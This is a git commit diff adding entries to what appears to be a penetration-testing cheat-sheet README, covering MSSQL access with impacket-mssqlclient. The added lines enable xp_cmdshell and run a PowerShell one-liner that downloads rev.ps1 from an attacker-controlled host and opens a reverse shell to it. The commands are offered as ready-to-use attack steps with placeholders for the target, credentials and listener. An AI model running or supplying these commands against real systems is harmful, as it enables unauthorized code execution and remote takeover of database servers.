Update README.md

2022-09-27 15:11:31 -04:00
parent caa55f52f3
commit 1e3248bd27
1 changed files with 5 additions and 0 deletions
--- a/README.md
+++ b/README.md
@@ -594,8 +594,13 @@ nmap -v -p 139, 445 --script=smb-os-discovery {IP ADDRESS}


 # Impacket-mssqlclient
+impacket-mssqlclient {USERNAME}:'{PASSWORD}'@{IP ADDRESS} 
 impacket-mssqlclient {USERNAME}:'{PASSWORD}'@{IP ADDRESS} -windows-auth

+# Enable Code Execution
+SQL> enable_xp_cmdshell
+SQL> EXEC xp_cmdshell 'echo IEX (New-Object Net.WebClient).DownloadString("http://{LHOST}/rev.ps1"); Invoke-PowerShellTcp -Reverse -IPAddress {LHOST} -Port {LPORT} | powershell -noprofile'
+
 # Note: Requires credentials
 # {IP ADDRESS}: IP Address of the Server
 # {USERNAME}:   User Authentication